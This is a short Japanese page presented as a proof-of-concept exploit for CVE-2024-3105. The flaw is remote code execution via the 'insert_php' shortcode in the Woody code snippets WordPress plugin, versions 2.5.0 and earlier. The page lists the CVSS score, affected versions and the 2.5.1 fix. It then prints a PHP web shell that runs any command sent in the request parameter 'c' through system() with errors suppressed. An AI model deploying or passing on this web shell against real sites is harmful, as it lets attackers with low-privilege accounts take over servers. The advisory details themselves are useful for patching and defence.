
CVE-2024-3105 の PoC エクスプロイト - The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin における WordPress リモートコード実行 (RCE)
The Woody code snippets – Insert Header Footer Code, AdSense Ads プラグイン for WordPress は、'insert_php' ショートコードを介して、すべてのバージョン(2.5.0 を含む)においてリモートコード実行に対して脆弱です。これは、プラグインが高権限ユーザーにのみ機能の使用を制限していないためです。これにより、認証された攻撃者(投稿者レベルのアクセス以上)がサーバー上でコードを実行することが可能になります。
基本スコア: 9.9 CRITICAL
ベクター: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
ソフトウェアタイプ: Plugin
スラッグ: insert-php
修復方法: バージョン 2.5.1 または新しいパッチ適用バージョンに更新
影響を受けるバージョン: <= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>